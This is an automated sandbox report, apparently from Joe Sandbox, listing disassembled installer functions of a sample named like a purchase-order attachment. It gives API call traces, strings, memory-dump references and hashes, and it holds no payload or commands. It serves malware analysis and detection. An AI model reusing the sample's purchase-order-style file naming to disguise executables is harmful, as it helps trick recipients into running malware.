                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,Regangen Setup,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F$Regangen Setup
                                                                      • API String ID: 941294808-439938914
                                                                      • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                      • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                                      • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                                      • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                      Function 00405A55 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405BE8,?,?), ref: 00405A64
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405BE8,?,?), ref: 00405A88
                                                                      • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405A91
                                                                        • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                        • Part of subcall function 004058E4: lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                      • GetShortPathNameA.KERNEL32(007A06D0,007A06D0,00000400), ref: 00405AAE
                                                                      • wsprintfA.USER32 ref: 00405ACC
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007A06D0,C0000000,00000004,007A06D0,?,?,?,?,?), ref: 00405B07
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B16
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B4E
                                                                      • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0079FED0,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA4
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405BB5
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BBC
                                                                        • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 00405983
                                                                        • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                      • String ID: %s=%s$NUL$[Rename]
                                                                      • API String ID: 222337774-4148678300
                                                                      • Opcode ID: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                      • Instruction ID: 28628270b370f13d709f2e98436788b9d19fd6dde28ce54c0a079e884eb7da61
                                                                      • Opcode Fuzzy Hash: 470faa373d492393558750a21a749fa660293524ffa589413fd4618ea5f3d9a4
                                                                      • Instruction Fuzzy Hash: 5A311371605B18ABD6206B215C89F6B3A6CDF45764F14013BFE01F22D2DA7CBC008EAD
                                                                      Function 00405F77 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FCF
                                                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405FDC
                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FE1
                                                                      • CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405FF1
                                                                      Strings
                                                                      • *?|<>/":, xrefs: 00405FBF
                                                                      • "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe", xrefs: 00405FB3
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F78
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-2185277754
                                                                      • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                      • Instruction ID: e323e08bdfda0f150b574f83967a69ba6361760ee6a09b3ffc5edc4c10c5e242
                                                                      • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                      • Instruction Fuzzy Hash: 01118F91808B926EFB3216244C44B7BAF898B577A4F18007BE5C5722C2DA7C5C429B6E
                                                                      Function 00403F58 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F75
                                                                      • GetSysColor.USER32(00000000), ref: 00403F91
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403F9D
                                                                      • SetBkMode.GDI32(?,?), ref: 00403FA9
                                                                      • GetSysColor.USER32(?), ref: 00403FBC
                                                                      • SetBkColor.GDI32(?,?), ref: 00403FCC
                                                                      • DeleteObject.GDI32(?), ref: 00403FE6
                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403FF0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                      • Instruction ID: 03c35b03fdde5f33accd48f8e357bf0732577442a8f103693b6bf1e6191b16fb
                                                                      • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                      • Instruction Fuzzy Hash: 71216271904705ABCB219F68ED48B4BBFF8AF01715B04892AF996A22E0D734EA04CB55
                                                                      Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 3730416702-0
                                                                      • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                      • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                      • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                      • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                      Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                      • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                      • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                      • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                      Function 004047F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040480B
                                                                      • GetMessagePos.USER32 ref: 00404813
                                                                      • ScreenToClient.USER32(?,?), ref: 0040482D
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040483F
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404865
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                      • Instruction ID: d51aeaa30401db709ca0a87e6a09b4ddb89123452d3ebce91a639796f0b83af5
                                                                      • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                      • Instruction Fuzzy Hash: 54019275D00218BADB00DBA4CC41BFEBBBCAF85711F10412BBB10B71C0C7B465018BA5
                                                                      Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                      • MulDiv.KERNEL32(000DEEFB,00000064,000E0340), ref: 00402BC5
                                                                      • wsprintfA.USER32 ref: 00402BD5
                                                                      • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402BCF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                      • Instruction ID: 06d6233bfb864841df38fb05631849b064d35824abf3621066cb5e46443ac4cc
                                                                      • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                      • Instruction Fuzzy Hash: EE014F70540209FBEF209F60DD4AEAE3B69AB04304F00803AFA16B92D0D7B8A951DB59
                                                                      Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D3B
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                      • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID: Tahoma
                                                                      • API String ID: 3808545654-3580928618
                                                                      • Opcode ID: 7cd5ed8a4b4f09cdd512241ed4d77026764b80ee4c75be1284d7c37bf19adfef
                                                                      • Instruction ID: cf9238c777b6589bee1a324002302adcb4b1f2371c80511fc572ea77625e262b
                                                                      • Opcode Fuzzy Hash: 7cd5ed8a4b4f09cdd512241ed4d77026764b80ee4c75be1284d7c37bf19adfef
                                                                      • Instruction Fuzzy Hash: 96016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E2C67811569B3F
                                                                      Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,00008A00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                      • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: c372e968d9e395b418133328b66b822104ab768b7d8a0d8c505769ff06cebaf7
                                                                      • Instruction ID: f67dc9fade15bd1aaf4953b10d7ffc98cf8df4ed40540c93fb8cebdcb82cf2c3
                                                                      • Opcode Fuzzy Hash: c372e968d9e395b418133328b66b822104ab768b7d8a0d8c505769ff06cebaf7
                                                                      • Instruction Fuzzy Hash: 71217A71800128BBCF216FA5DE49EAEBB79EF09324F10022AF914762E1C7795D018B99
                                                                      Function 004046E6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                      • wsprintfA.USER32 ref: 0040478C
                                                                      • SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
